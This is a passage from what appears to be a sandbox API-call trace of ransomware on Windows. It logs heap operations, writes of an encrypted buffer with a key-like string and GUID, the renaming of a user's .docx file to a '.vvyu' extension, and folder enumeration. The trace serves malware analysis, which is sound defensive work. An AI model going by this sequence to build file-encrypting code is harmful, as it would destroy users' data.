[0192.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3c48 | out: hHeap=0x2c0000) returned 1 [0192.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.698] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1445e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1445e, lpOverlapped=0x0) returned 1 [0192.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.699] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14463, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.699] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.700] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.701] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.701] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.701] CloseHandle (hObject=0x584) returned 1 [0192.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0192.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0192.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0192.703] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\Ua71cE_srBW.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ua71ce_srbw.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\Ua71cE_srBW.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ua71ce_srbw.docx.vvyu")) returned 1 [0192.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.714] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0192.717] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 1 [0192.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b860 [0192.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0192.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0192.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b7d8 [0192.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8eb8 | out: hHeap=0x2c0000) returned 1 [0192.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0192.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0192.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0192.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0192.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b860 | out: hHeap=0x2c0000) returned 1 [0192.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.720] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 0 [0192.720] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0192.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0192.721] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0192.721] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 